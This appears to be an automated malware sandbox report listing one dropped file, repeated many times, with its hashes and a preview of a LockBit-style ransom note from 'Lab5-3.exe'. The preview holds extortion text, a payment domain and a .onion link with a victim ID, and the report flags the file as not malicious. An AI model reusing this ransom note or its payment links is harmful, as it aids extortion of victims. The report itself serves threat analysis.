                                                                                                          SHA-512:B49EC5246753A9F857278235BEEA0A84667AF5DBCC8FA1295807F6D9248E0920EE45584DDDED739036C965C055AF2A67A8E435E502CF9C5115E0F913EA897F09
                                                                                                          Malicious:false
                                                                                                          Preview:All your important files are encrypted!..Any attempts to restore your files with the thrid-party software will be fatal for your files!..RESTORE YOU DATA POSIBLE ONLY BUYING private key from us...There is only one way to get your files back:....1) Through a standard browser(FireFox, Chrome, Edge, Opera)..| 1. Open link http://lockbit-decryptor.top/?BC76D224712A7481BC6E90ACB6D18E50..| 2. Follow the instructions on this page......2) Through a Tor Browser - recommended..| 1. Download Tor browser - https://www.torproject.org/ and install it...| 2. Open link in TOR browser - http://lockbitks2tvnmwk.onion/?BC76D224712A7481BC6E90ACB6D18E50... This link only works in Tor Browser! ..| 3. Follow the instructions on this page...... ### Attention! ###.. # lockbit-decryptor.top may be blocked. We recommend using a Tor browser to access the site.. # Do not rename encrypted files... # Do not try to decrypt using third party software, it may cause permanent data loss... # Decryption of your files wit
                                                                                                          Process:C:\Users\user\Desktop\Lab5-3.exe
                                                                                                          File Type:ASCII text, with CRLF line terminators
                                                                                                          Category:dropped
                                                                                                          Size (bytes):1281
                                                                                                          Entropy (8bit):5.0109143188305945
                                                                                                          Encrypted:false
                                                                                                          SSDEEP:24:hXtdFjtPuy1DK6vh88waN7LnNvhv6M9wDKvDtrCAuVcHdBUi:hXltG76vDnNvs0LMAuyH1
                                                                                                          MD5:AD01B46BC788640E0B348FFCEAD87439
                                                                                                          SHA1:0663F726C339E9C5D0EEC46D274C7C2456843C01
                                                                                                          SHA-256:234AAED071BF79A99676C06B51F1D98432AD7C143C604EDC16664490EBF22E96
                                                                                                          SHA-512:B49EC5246753A9F857278235BEEA0A84667AF5DBCC8FA1295807F6D9248E0920EE45584DDDED739036C965C055AF2A67A8E435E502CF9C5115E0F913EA897F09
                                                                                                          Malicious:false
                                                                                                          Preview:All your important files are encrypted!..Any attempts to restore your files with the thrid-party software will be fatal for your files!..RESTORE YOU DATA POSIBLE ONLY BUYING private key from us...There is only one way to get your files back:....1) Through a standard browser(FireFox, Chrome, Edge, Opera)..| 1. Open link http://lockbit-decryptor.top/?BC76D224712A7481BC6E90ACB6D18E50..| 2. Follow the instructions on this page......2) Through a Tor Browser - recommended..| 1. Download Tor browser - https://www.torproject.org/ and install it...| 2. Open link in TOR browser - http://lockbitks2tvnmwk.onion/?BC76D224712A7481BC6E90ACB6D18E50... This link only works in Tor Browser! ..| 3. Follow the instructions on this page...... ### Attention! ###.. # lockbit-decryptor.top may be blocked. We recommend using a Tor browser to access the site.. # Do not rename encrypted files... # Do not try to decrypt using third party software, it may cause permanent data loss... # Decryption of your files wit
                                                                                                          Process:C:\Users\user\Desktop\Lab5-3.exe
                                                                                                          File Type:ASCII text, with CRLF line terminators
                                                                                                          Category:dropped
                                                                                                          Size (bytes):1281
                                                                                                          Entropy (8bit):5.0109143188305945
                                                                                                          Encrypted:false
                                                                                                          SSDEEP:24:hXtdFjtPuy1DK6vh88waN7LnNvhv6M9wDKvDtrCAuVcHdBUi:hXltG76vDnNvs0LMAuyH1
                                                                                                          MD5:AD01B46BC788640E0B348FFCEAD87439
                                                                                                          SHA1:0663F726C339E9C5D0EEC46D274C7C2456843C01
                                                                                                          SHA-256:234AAED071BF79A99676C06B51F1D98432AD7C143C604EDC16664490EBF22E96
                                                                                                          SHA-512:B49EC5246753A9F857278235BEEA0A84667AF5DBCC8FA1295807F6D9248E0920EE45584DDDED739036C965C055AF2A67A8E435E502CF9C5115E0F913EA897F09
                                                                                                          Malicious:false
                                                                                                          Preview:All your important files are encrypted!..Any attempts to restore your files with the thrid-party software will be fatal for your files!..RESTORE YOU DATA POSIBLE ONLY BUYING private key from us...There is only one way to get your files back:....1) Through a standard browser(FireFox, Chrome, Edge, Opera)..| 1. Open link http://lockbit-decryptor.top/?BC76D224712A7481BC6E90ACB6D18E50..| 2. Follow the instructions on this page......2) Through a Tor Browser - recommended..| 1. Download Tor browser - https://www.torproject.org/ and install it...| 2. Open link in TOR browser - http://lockbitks2tvnmwk.onion/?BC76D224712A7481BC6E90ACB6D18E50... This link only works in Tor Browser! ..| 3. Follow the instructions on this page...... ### Attention! ###.. # lockbit-decryptor.top may be blocked. We recommend using a Tor browser to access the site.. # Do not rename encrypted files... # Do not try to decrypt using third party software, it may cause permanent data loss... # Decryption of your files wit
                                                                                                          Process:C:\Users\user\Desktop\Lab5-3.exe
                                                                                                          File Type:ASCII text, with CRLF line terminators
                                                                                                          Category:dropped
                                                                                                          Size (bytes):1281
                                                                                                          Entropy (8bit):5.0109143188305945
                                                                                                          Encrypted:false
                                                                                                          SSDEEP:24:hXtdFjtPuy1DK6vh88waN7LnNvhv6M9wDKvDtrCAuVcHdBUi:hXltG76vDnNvs0LMAuyH1
                                                                                                          MD5:AD01B46BC788640E0B348FFCEAD87439
                                                                                                          SHA1:0663F726C339E9C5D0EEC46D274C7C2456843C01
                                                                                                          SHA-256:234AAED071BF79A99676C06B51F1D98432AD7C143C604EDC16664490EBF22E96
                                                                                                          SHA-512:B49EC5246753A9F857278235BEEA0A84667AF5DBCC8FA1295807F6D9248E0920EE45584DDDED739036C965C055AF2A67A8E435E502CF9C5115E0F913EA897F09
                                                                                                          Malicious:false
                                                                                                          Preview:All your important files are encrypted!..Any attempts to restore your files with the thrid-party software will be fatal for your files!..RESTORE YOU DATA POSIBLE ONLY BUYING private key from us...There is only one way to get your files back:....1) Through a standard browser(FireFox, Chrome, Edge, Opera)..| 1. Open link http://lockbit-decryptor.top/?BC76D224712A7481BC6E90ACB6D18E50..| 2. Follow the instructions on this page......2) Through a Tor Browser - recommended..| 1. Download Tor browser - https://www.torproject.org/ and install it...| 2. Open link in TOR browser - http://lockbitks2tvnmwk.onion/?BC76D224712A7481BC6E90ACB6D18E50... This link only works in Tor Browser! ..| 3. Follow the instructions on this page...... ### Attention! ###.. # lockbit-decryptor.top may be blocked. We recommend using a Tor browser to access the site.. # Do not rename encrypted files... # Do not try to decrypt using third party software, it may cause permanent data loss... # Decryption of your files wit
                                                                                                          Process:C:\Users\user\Desktop\Lab5-3.exe
                                                                                                          File Type:ASCII text, with CRLF line terminators
                                                                                                          Category:dropped
                                                                                                          Size (bytes):1281
                                                                                                          Entropy (8bit):5.0109143188305945
                                                                                                          Encrypted:false
                                                                                                          SSDEEP:24:hXtdFjtPuy1DK6vh88waN7LnNvhv6M9wDKvDtrCAuVcHdBUi:hXltG76vDnNvs0LMAuyH1
                                                                                                          MD5:AD01B46BC788640E0B348FFCEAD87439
                                                                                                          SHA1:0663F726C339E9C5D0EEC46D274C7C2456843C01
                                                                                                          SHA-256:234AAED071BF79A99676C06B51F1D98432AD7C143C604EDC16664490EBF22E96
                                                                                                          SHA-512:B49EC5246753A9F857278235BEEA0A84667AF5DBCC8FA1295807F6D9248E0920EE45584DDDED739036C965C055AF2A67A8E435E502CF9C5115E0F913EA897F09
                                                                                                          Malicious:false
                                                                                                          Preview:All your important files are encrypted!..Any attempts to restore your files with the thrid-party software will be fatal for your files!..RESTORE YOU DATA POSIBLE ONLY BUYING private key from us...There is only one way to get your files back:....1) Through a standard browser(FireFox, Chrome, Edge, Opera)..| 1. Open link http://lockbit-decryptor.top/?BC76D224712A7481BC6E90ACB6D18E50..| 2. Follow the instructions on this page......2) Through a Tor Browser - recommended..| 1. Download Tor browser - https://www.torproject.org/ and install it...| 2. Open link in TOR browser - http://lockbitks2tvnmwk.onion/?BC76D224712A7481BC6E90ACB6D18E50... This link only works in Tor Browser! ..| 3. Follow the instructions on this page...... ### Attention! ###.. # lockbit-decryptor.top may be blocked. We recommend using a Tor browser to access the site.. # Do not rename encrypted files... # Do not try to decrypt using third party software, it may cause permanent data loss... # Decryption of your files wit
                                                                                                          Process:C:\Users\user\Desktop\Lab5-3.exe
                                                                                                          File Type:ASCII text, with CRLF line terminators
                                                                                                          Category:dropped
                                                                                                          Size (bytes):1281
                                                                                                          Entropy (8bit):5.0109143188305945
                                                                                                          Encrypted:false
                                                                                                          SSDEEP:24:hXtdFjtPuy1DK6vh88waN7LnNvhv6M9wDKvDtrCAuVcHdBUi:hXltG76vDnNvs0LMAuyH1
                                                                                                          MD5:AD01B46BC788640E0B348FFCEAD87439
                                                                                                          SHA1:0663F726C339E9C5D0EEC46D274C7C2456843C01
                                                                                                          SHA-256:234AAED071BF79A99676C06B51F1D98432AD7C143C604EDC16664490EBF22E96
                                                                                                          SHA-512:B49EC5246753A9F857278235BEEA0A84667AF5DBCC8FA1295807F6D9248E0920EE45584DDDED739036C965C055AF2A67A8E435E502CF9C5115E0F913EA897F09
                                                                                                          Malicious:false
                                                                                                          Preview:All your important files are encrypted!..Any attempts to restore your files with the thrid-party software will be fatal for your files!..RESTORE YOU DATA POSIBLE ONLY BUYING private key from us...There is only one way to get your files back:....1) Through a standard browser(FireFox, Chrome, Edge, Opera)..| 1. Open link http://lockbit-decryptor.top/?BC76D224712A7481BC6E90ACB6D18E50..| 2. Follow the instructions on this page......2) Through a Tor Browser - recommended..| 1. Download Tor browser - https://www.torproject.org/ and install it...| 2. Open link in TOR browser - http://lockbitks2tvnmwk.onion/?BC76D224712A7481BC6E90ACB6D18E50... This link only works in Tor Browser! ..| 3. Follow the instructions on this page...... ### Attention! ###.. # lockbit-decryptor.top may be blocked. We recommend using a Tor browser to access the site.. # Do not rename encrypted files... # Do not try to decrypt using third party software, it may cause permanent data loss... # Decryption of your files wit
                                                                                                          Process:C:\Users\user\Desktop\Lab5-3.exe
                                                                                                          File Type:ASCII text, with CRLF line terminators
                                                                                                          Category:dropped
                                                                                                          Size (bytes):1281
                                                                                                          Entropy (8bit):5.0109143188305945
                                                                                                          Encrypted:false
                                                                                                          SSDEEP:24:hXtdFjtPuy1DK6vh88waN7LnNvhv6M9wDKvDtrCAuVcHdBUi:hXltG76vDnNvs0LMAuyH1
                                                                                                          MD5:AD01B46BC788640E0B348FFCEAD87439
                                                                                                          SHA1:0663F726C339E9C5D0EEC46D274C7C2456843C01
                                                                                                          SHA-256:234AAED071BF79A99676C06B51F1D98432AD7C143C604EDC16664490EBF22E96
                                                                                                          SHA-512:B49EC5246753A9F857278235BEEA0A84667AF5DBCC8FA1295807F6D9248E0920EE45584DDDED739036C965C055AF2A67A8E435E502CF9C5115E0F913EA897F09
                                                                                                          Malicious:false
                                                                                                          Preview:All your important files are encrypted!..Any attempts to restore your files with the thrid-party software will be fatal for your files!..RESTORE YOU DATA POSIBLE ONLY BUYING private key from us...There is only one way to get your files back:....1) Through a standard browser(FireFox, Chrome, Edge, Opera)..| 1. Open link http://lockbit-decryptor.top/?BC76D224712A7481BC6E90ACB6D18E50..| 2. Follow the instructions on this page......2) Through a Tor Browser - recommended..| 1. Download Tor browser - https://www.torproject.org/ and install it...| 2. Open link in TOR browser - http://lockbitks2tvnmwk.onion/?BC76D224712A7481BC6E90ACB6D18E50... This link only works in Tor Browser! ..| 3. Follow the instructions on this page...... ### Attention! ###.. # lockbit-decryptor.top may be blocked. We recommend using a Tor browser to access the site.. # Do not rename encrypted files... # Do not try to decrypt using third party software, it may cause permanent data loss... # Decryption of your files wit
                                                                                                          Process:C:\Users\user\Desktop\Lab5-3.exe
                                                                                                          File Type:ASCII text, with CRLF line terminators
                                                                                                          Category:dropped
                                                                                                          Size (bytes):1281
                                                                                                          Entropy (8bit):5.0109143188305945
                                                                                                          Encrypted:false
                                                                                                          SSDEEP:24:hXtdFjtPuy1DK6vh88waN7LnNvhv6M9wDKvDtrCAuVcHdBUi:hXltG76vDnNvs0LMAuyH1
                                                                                                          MD5:AD01B46BC788640E0B348FFCEAD87439
                                                                                                          SHA1:0663F726C339E9C5D0EEC46D274C7C2456843C01
                                                                                                          SHA-256:234AAED071BF79A99676C06B51F1D98432AD7C143C604EDC16664490EBF22E96
                                                                                                          SHA-512:B49EC5246753A9F857278235BEEA0A84667AF5DBCC8FA1295807F6D9248E0920EE45584DDDED739036C965C055AF2A67A8E435E502CF9C5115E0F913EA897F09
                                                                                                          Malicious:false
                                                                                                          Preview:All your important files are encrypted!..Any attempts to restore your files with the thrid-party software will be fatal for your files!..RESTORE YOU DATA POSIBLE ONLY BUYING private key from us...There is only one way to get your files back:....1) Through a standard browser(FireFox, Chrome, Edge, Opera)..| 1. Open link http://lockbit-decryptor.top/?BC76D224712A7481BC6E90ACB6D18E50..| 2. Follow the instructions on this page......2) Through a Tor Browser - recommended..| 1. Download Tor browser - https://www.torproject.org/ and install it...| 2. Open link in TOR browser - http://lockbitks2tvnmwk.onion/?BC76D224712A7481BC6E90ACB6D18E50... This link only works in Tor Browser! ..| 3. Follow the instructions on this page...... ### Attention! ###.. # lockbit-decryptor.top may be blocked. We recommend using a Tor browser to access the site.. # Do not rename encrypted files... # Do not try to decrypt using third party software, it may cause permanent data loss... # Decryption of your files wit
                                                                                                          Process:C:\Users\user\Desktop\Lab5-3.exe
                                                                                                          File Type:ASCII text, with CRLF line terminators
                                                                                                          Category:dropped
                                                                                                          Size (bytes):1281
                                                                                                          Entropy (8bit):5.0109143188305945
                                                                                                          Encrypted:false
                                                                                                          SSDEEP:24:hXtdFjtPuy1DK6vh88waN7LnNvhv6M9wDKvDtrCAuVcHdBUi:hXltG76vDnNvs0LMAuyH1
                                                                                                          MD5:AD01B46BC788640E0B348FFCEAD87439
                                                                                                          SHA1:0663F726C339E9C5D0EEC46D274C7C2456843C01
                                                                                                          SHA-256:234AAED071BF79A99676C06B51F1D98432AD7C143C604EDC16664490EBF22E96
                                                                                                          SHA-512:B49EC5246753A9F857278235BEEA0A84667AF5DBCC8FA1295807F6D9248E0920EE45584DDDED739036C965C055AF2A67A8E435E502CF9C5115E0F913EA897F09
                                                                                                          Malicious:false
                                                                                                          Preview:All your important files are encrypted!..Any attempts to restore your files with the thrid-party software will be fatal for your files!..RESTORE YOU DATA POSIBLE ONLY BUYING private key from us...There is only one way to get your files back:....1) Through a standard browser(FireFox, Chrome, Edge, Opera)..| 1. Open link http://lockbit-decryptor.top/?BC76D224712A7481BC6E90ACB6D18E50..| 2. Follow the instructions on this page......2) Through a Tor Browser - recommended..| 1. Download Tor browser - https://www.torproject.org/ and install it...| 2. Open link in TOR browser - http://lockbitks2tvnmwk.onion/?BC76D224712A7481BC6E90ACB6D18E50... This link only works in Tor Browser! ..| 3. Follow the instructions on this page...... ### Attention! ###.. # lockbit-decryptor.top may be blocked. We recommend using a Tor browser to access the site.. # Do not rename encrypted files... # Do not try to decrypt using third party software, it may cause permanent data loss... # Decryption of your files wit
                                                                                                          Process:C:\Users\user\Desktop\Lab5-3.exe
                                                                                                          File Type:ASCII text, with CRLF line terminators
                                                                                                          Category:dropped
                                                                                                          Size (bytes):1281
                                                                                                          Entropy (8bit):5.0109143188305945
                                                                                                          Encrypted:false
                                                                                                          SSDEEP:24:hXtdFjtPuy1DK6vh88waN7LnNvhv6M9wDKvDtrCAuVcHdBUi:hXltG76vDnNvs0LMAuyH1
                                                                                                          MD5:AD01B46BC788640E0B348FFCEAD87439
                                                                                                          SHA1:0663F726C339E9C5D0EEC46D274C7C2456843C01
                                                                                                          SHA-256:234AAED071BF79A99676C06B51F1D98432AD7C143C604EDC16664490EBF22E96
                                                                                                          SHA-512:B49EC5246753A9F857278235BEEA0A84667AF5DBCC8FA1295807F6D9248E0920EE45584DDDED739036C965C055AF2A67A8E435E502CF9C5115E0F913EA897F09
                                                                                                          Malicious:false
                                                                                                          Preview:All your important files are encrypted!..Any attempts to restore your files with the thrid-party software will be fatal for your files!..RESTORE YOU DATA POSIBLE ONLY BUYING private key from us...There is only one way to get your files back:....1) Through a standard browser(FireFox, Chrome, Edge, Opera)..| 1. Open link http://lockbit-decryptor.top/?BC76D224712A7481BC6E90ACB6D18E50..| 2. Follow the instructions on this page......2) Through a Tor Browser - recommended..| 1. Download Tor browser - https://www.torproject.org/ and install it...| 2. Open link in TOR browser - http://lockbitks2tvnmwk.onion/?BC76D224712A7481BC6E90ACB6D18E50... This link only works in Tor Browser! ..| 3. Follow the instructions on this page...... ### Attention! ###.. # lockbit-decryptor.top may be blocked. We recommend using a Tor browser to access the site.. # Do not rename encrypted files... # Do not try to decrypt using third party software, it may cause permanent data loss... # Decryption of your files wit
                                                                                                          Process:C:\Users\user\Desktop\Lab5-3.exe
                                                                                                          File Type:ASCII text, with CRLF line terminators
                                                                                                          Category:dropped
                                                                                                          Size (bytes):1281
                                                                                                          Entropy (8bit):5.0109143188305945
                                                                                                          Encrypted:false
                                                                                                          SSDEEP:24:hXtdFjtPuy1DK6vh88waN7LnNvhv6M9wDKvDtrCAuVcHdBUi:hXltG76vDnNvs0LMAuyH1
                                                                                                          MD5:AD01B46BC788640E0B348FFCEAD87439
                                                                                                          SHA1:0663F726C339E9C5D0EEC46D274C7C2456843C01
                                                                                                          SHA-256:234AAED071BF79A99676C06B51F1D98432AD7C143C604EDC16664490EBF22E96
                                                                                                          SHA-512:B49EC5246753A9F857278235BEEA0A84667AF5DBCC8FA1295807F6D9248E0920EE45584DDDED739036C965C055AF2A67A8E435E502CF9C5115E0F913EA897F09
                                                                                                          Malicious:false
                                                                                                          Preview:All your important files are encrypted!..Any attempts to restore your files with the thrid-party software will be fatal for your files!..RESTORE YOU DATA POSIBLE ONLY BUYING private key from us...There is only one way to get your files back:....1) Through a standard browser(FireFox, Chrome, Edge, Opera)..| 1. Open link http://lockbit-decryptor.top/?BC76D224712A7481BC6E90ACB6D18E50..| 2. Follow the instructions on this page......2) Through a Tor Browser - recommended..| 1. Download Tor browser - https://www.torproject.org/ and install it...| 2. Open link in TOR browser - http://lockbitks2tvnmwk.onion/?BC76D224712A7481BC6E90ACB6D18E50... This link only works in Tor Browser! ..| 3. Follow the instructions on this page...... ### Attention! ###.. # lockbit-decryptor.top may be blocked. We recommend using a Tor browser to access the site.. # Do not rename encrypted files... # Do not try to decrypt using third party software, it may cause permanent data loss... # Decryption of your files wit
                                                                                                          Process:C:\Users\user\Desktop\Lab5-3.exe
                                                                                                          File Type:ASCII text, with CRLF line terminators
                                                                                                          Category:dropped
                                                                                                          Size (bytes):1281
                                                                                                          Entropy (8bit):5.0109143188305945
                                                                                                          Encrypted:false
                                                                                                          SSDEEP:24:hXtdFjtPuy1DK6vh88waN7LnNvhv6M9wDKvDtrCAuVcHdBUi:hXltG76vDnNvs0LMAuyH1
                                                                                                          MD5:AD01B46BC788640E0B348FFCEAD87439
                                                                                                          SHA1:0663F726C339E9C5D0EEC46D274C7C2456843C01
                                                                                                          SHA-256:234AAED071BF79A99676C06B51F1D98432AD7C143C604EDC16664490EBF22E96
                                                                                                          SHA-512:B49EC5246753A9F857278235BEEA0A84667AF5DBCC8FA1295807F6D9248E0920EE45584DDDED739036C965C055AF2A67A8E435E502CF9C5115E0F913EA897F09
                                                                                                          Malicious:false
                                                                                                          Preview:All your important files are encrypted!..Any attempts to restore your files with the thrid-party software will be fatal for your files!..RESTORE YOU DATA POSIBLE ONLY BUYING private key from us...There is only one way to get your files back:....1) Through a standard browser(FireFox, Chrome, Edge, Opera)..| 1. Open link http://lockbit-decryptor.top/?BC76D224712A7481BC6E90ACB6D18E50..| 2. Follow the instructions on this page......2) Through a Tor Browser - recommended..| 1. Download Tor browser - https://www.torproject.org/ and install it...| 2. Open link in TOR browser - http://lockbitks2tvnmwk.onion/?BC76D224712A7481BC6E90ACB6D18E50... This link only works in Tor Browser! ..| 3. Follow the instructions on this page...... ### Attention! ###.. # lockbit-decryptor.top may be blocked. We recommend using a Tor browser to access the site.. # Do not rename encrypted files... # Do not try to decrypt using third party software, it may cause permanent data loss... # Decryption of your files wit
                                                                                                          Process:C:\Users\user\Desktop\Lab5-3.exe
                                                                                                          File Type:ASCII text, with CRLF line terminators
                                                                                                          Category:dropped
                                                                                                          Size (bytes):1281
                                                                                                          Entropy (8bit):5.0109143188305945
                                                                                                          Encrypted:false
                                                                                                          SSDEEP:24:hXtdFjtPuy1DK6vh88waN7LnNvhv6M9wDKvDtrCAuVcHdBUi:hXltG76vDnNvs0LMAuyH1
                                                                                                          MD5:AD01B46BC788640E0B348FFCEAD87439
                                                                                                          SHA1:0663F726C339E9C5D0EEC46D274C7C2456843C01
                                                                                                          SHA-256:234AAED071BF79A99676C06B51F1D98432AD7C143C604EDC16664490EBF22E96
                                                                                                          SHA-512:B49EC5246753A9F857278235BEEA0A84667AF5DBCC8FA1295807F6D9248E0920EE45584DDDED739036C965C055AF2A67A8E435E502CF9C5115E0F913EA897F09
                                                                                                          Malicious:false
                                                                                                          Preview:All your important files are encrypted!..Any attempts to restore your files with the thrid-party software will be fatal for your files!..RESTORE YOU DATA POSIBLE ONLY BUYING private key from us...There is only one way to get your files back:....1) Through a standard browser(FireFox, Chrome, Edge, Opera)..| 1. Open link http://lockbit-decryptor.top/?BC76D224712A7481BC6E90ACB6D18E50..| 2. Follow the instructions on this page......2) Through a Tor Browser - recommended..| 1. Download Tor browser - https://www.torproject.org/ and install it...| 2. Open link in TOR browser - http://lockbitks2tvnmwk.onion/?BC76D224712A7481BC6E90ACB6D18E50... This link only works in Tor Browser! ..| 3. Follow the instructions on this page...... ### Attention! ###.. # lockbit-decryptor.top may be blocked. We recommend using a Tor browser to access the site.. # Do not rename encrypted files... # Do not try to decrypt using third party software, it may cause permanent data loss... # Decryption of your files wit
                                                                                                          Process:C:\Users\user\Desktop\Lab5-3.exe
                                                                                                          File Type:ASCII text, with CRLF line terminators
                                                                                                          Category:dropped
                                                                                                          Size (bytes):1281
                                                                                                          Entropy (8bit):5.0109143188305945
                                                                                                          Encrypted:false
                                                                                                          SSDEEP:24:hXtdFjtPuy1DK6vh88waN7LnNvhv6M9wDKvDtrCAuVcHdBUi:hXltG76vDnNvs0LMAuyH1
                                                                                                          MD5:AD01B46BC788640E0B348FFCEAD87439
                                                                                                          SHA1:0663F726C339E9C5D0EEC46D274C7C2456843C01
                                                                                                          SHA-256:234AAED071BF79A99676C06B51F1D98432AD7C143C604EDC16664490EBF22E96
                                                                                                          SHA-512:B49EC5246753A9F857278235BEEA0A84667AF5DBCC8FA1295807F6D9248E0920EE45584DDDED739036C965C055AF2A67A8E435E502CF9C5115E0F913EA897F09
                                                                                                          Malicious:false
                                                                                                          Preview:All your important files are encrypted!..Any attempts to restore your files with the thrid-party software will be fatal for your files!..RESTORE YOU DATA POSIBLE ONLY BUYING private key from us...There is only one way to get your files back:....1) Through a standard browser(FireFox, Chrome, Edge, Opera)..| 1. Open link http://lockbit-decryptor.top/?BC76D224712A7481BC6E90ACB6D18E50..| 2. Follow the instructions on this page......2) Through a Tor Browser - recommended..| 1. Download Tor browser - https://www.torproject.org/ and install it...| 2. Open link in TOR browser - http://lockbitks2tvnmwk.onion/?BC76D224712A7481BC6E90ACB6D18E50... This link only works in Tor Browser! ..| 3. Follow the instructions on this page...... ### Attention! ###.. # lockbit-decryptor.top may be blocked. We recommend using a Tor browser to access the site.. # Do not rename encrypted files... # Do not try to decrypt using third party software, it may cause permanent data loss... # Decryption of your files wit
                                                                                                          Process:C:\Users\user\Desktop\Lab5-3.exe
                                                                                                          File Type:ASCII text, with CRLF line terminators
                                                                                                          Category:dropped
                                                                                                          Size (bytes):1281
                                                                                                          Entropy (8bit):5.0109143188305945
                                                                                                          Encrypted:false
                                                                                                          SSDEEP:24:hXtdFjtPuy1DK6vh88waN7LnNvhv6M9wDKvDtrCAuVcHdBUi:hXltG76vDnNvs0LMAuyH1
                                                                                                          MD5:AD01B46BC788640E0B348FFCEAD87439
                                                                                                          SHA1:0663F726C339E9C5D0EEC46D274C7C2456843C01
                                                                                                          SHA-256:234AAED071BF79A99676C06B51F1D98432AD7C143C604EDC16664490EBF22E96
                                                                                                          SHA-512:B49EC5246753A9F857278235BEEA0A84667AF5DBCC8FA1295807F6D9248E0920EE45584DDDED739036C965C055AF2A67A8E435E502CF9C5115E0F913EA897F09
                                                                                                          Malicious:false
                                                                                                          Preview:All your important files are encrypted!..Any attempts to restore your files with the thrid-party software will be fatal for your files!..RESTORE YOU DATA POSIBLE ONLY BUYING private key from us...There is only one way to get your files back:....1) Through a standard browser(FireFox, Chrome, Edge, Opera)..| 1. Open link http://lockbit-decryptor.top/?BC76D224712A7481BC6E90ACB6D18E50..| 2. Follow the instructions on this page......2) Through a Tor Browser - recommended..| 1. Download Tor browser - https://www.torproject.org/ and install it...| 2. Open link in TOR browser - http://lockbitks2tvnmwk.onion/?BC76D224712A7481BC6E90ACB6D18E50... This link only works in Tor Browser! ..| 3. Follow the instructions on this page...... ### Attention! ###.. # lockbit-decryptor.top may be blocked. We recommend using a Tor browser to access the site.. # Do not rename encrypted files... # Do not try to decrypt using third party software, it may cause permanent data loss... # Decryption of your files wit
                                                                                                          Process:C:\Users\user\Desktop\Lab5-3.exe
                                                                                                          File Type:ASCII text, with CRLF line terminators
                                                                                                          Category:dropped
                                                                                                          Size (bytes):1281
                                                                                                          Entropy (8bit):5.0109143188305945
                                                                                                          Encrypted:false
                                                                                                          SSDEEP:24:hXtdFjtPuy1DK6vh88waN7LnNvhv6M9wDKvDtrCAuVcHdBUi:hXltG76vDnNvs0LMAuyH1
                                                                                                          MD5:AD01B46BC788640E0B348FFCEAD87439
                                                                                                          SHA1:0663F726C339E9C5D0EEC46D274C7C2456843C01
                                                                                                          SHA-256:234AAED071BF79A99676C06B51F1D98432AD7C143C604EDC16664490EBF22E96
                                                                                                          SHA-512:B49EC5246753A9F857278235BEEA0A84667AF5DBCC8FA1295807F6D9248E0920EE45584DDDED739036C965C055AF2A67A8E435E502CF9C5115E0F913EA897F09
                                                                                                          Malicious:false
                                                                                                          Preview:All your important files are encrypted!..Any attempts to restore your files with the thrid-party software will be fatal for your files!..RESTORE YOU DATA POSIBLE ONLY BUYING private key from us...There is only one way to get your files back:....1) Through a standard browser(FireFox, Chrome, Edge, Opera)..| 1. Open link http://lockbit-decryptor.top/?BC76D224712A7481BC6E90ACB6D18E50..| 2. Follow the instructions on this page......2) Through a Tor Browser - recommended..| 1. Download Tor browser - https://www.torproject.org/ and install it...| 2. Open link in TOR browser - http://lockbitks2tvnmwk.onion/?BC76D224712A7481BC6E90ACB6D18E50... This link only works in Tor Browser! ..| 3. Follow the instructions on this page...... ### Attention! ###.. # lockbit-decryptor.top may be blocked. We recommend using a Tor browser to access the site.. # Do not rename encrypted files... # Do not try to decrypt using third party software, it may cause permanent data loss... # Decryption of your files wit
                                                                                                          Process:C:\Users\user\Desktop\Lab5-3.exe
                                                                                                          File Type:ASCII text, with CRLF line terminators
                                                                                                          Category:dropped
                                                                                                          Size (bytes):1281
                                                                                                          Entropy (8bit):5.0109143188305945
                                                                                                          Encrypted:false
                                                                                                          SSDEEP:24:hXtdFjtPuy1DK6vh88waN7LnNvhv6M9wDKvDtrCAuVcHdBUi:hXltG76vDnNvs0LMAuyH1
                                                                                                          MD5:AD01B46BC788640E0B348FFCEAD87439
                                                                                                          SHA1:0663F726C339E9C5D0EEC46D274C7C2456843C01
                                                                                                          SHA-256:234AAED071BF79A99676C06B51F1D98432AD7C143C604EDC16664490EBF22E96
                                                                                                          SHA-512:B49EC5246753A9F857278235BEEA0A84667AF5DBCC8FA1295807F6D9248E0920EE45584DDDED739036C965C055AF2A67A8E435E502CF9C5115E0F913EA897F09
                                                                                                          Malicious:false
                                                                                                          Preview:All your important files are encrypted!..Any attempts to restore your files with the thrid-party software will be fatal for your files!..RESTORE YOU DATA POSIBLE ONLY BUYING private key from us...There is only one way to get your files back:....1) Through a standard browser(FireFox, Chrome, Edge, Opera)..| 1. Open link http://lockbit-decryptor.top/?BC76D224712A7481BC6E90ACB6D18E50..| 2. Follow the instructions on this page......2) Through a Tor Browser - recommended..| 1. Download Tor browser - https://www.torproject.org/ and install it...| 2. Open link in TOR browser - http://lockbitks2tvnmwk.onion/?BC76D224712A7481BC6E90ACB6D18E50... This link only works in Tor Browser! ..| 3. Follow the instructions on this page...... ### Attention! ###.. # lockbit-decryptor.top may be blocked. We recommend using a Tor browser to access the site.. # Do not rename encrypted files... # Do not try to decrypt using third party software, it may cause permanent data loss... # Decryption of your files wit
                                                                                                          Process:C:\Users\user\Desktop\Lab5-3.exe
                                                                                                          File Type:ASCII text, with CRLF line terminators
                                                                                                          Category:dropped
                                                                                                          Size (bytes):1281
                                                                                                          Entropy (8bit):5.0109143188305945
                                                                                                          Encrypted:false
                                                                                                          SSDEEP:24:hXtdFjtPuy1DK6vh88waN7LnNvhv6M9wDKvDtrCAuVcHdBUi:hXltG76vDnNvs0LMAuyH1
                                                                                                          MD5:AD01B46BC788640E0B348FFCEAD87439
                                                                                                          SHA1:0663F726C339E9C5D0EEC46D274C7C2456843C01
                                                                                                          SHA-256:234AAED071BF79A99676C06B51F1D98432AD7C143C604EDC16664490EBF22E96
                                                                                                          SHA-512:B49EC5246753A9F857278235BEEA0A84667AF5DBCC8FA1295807F6D9248E0920EE45584DDDED739036C965C055AF2A67A8E435E502CF9C5115E0F913EA897F09
                                                                                                          Malicious:false
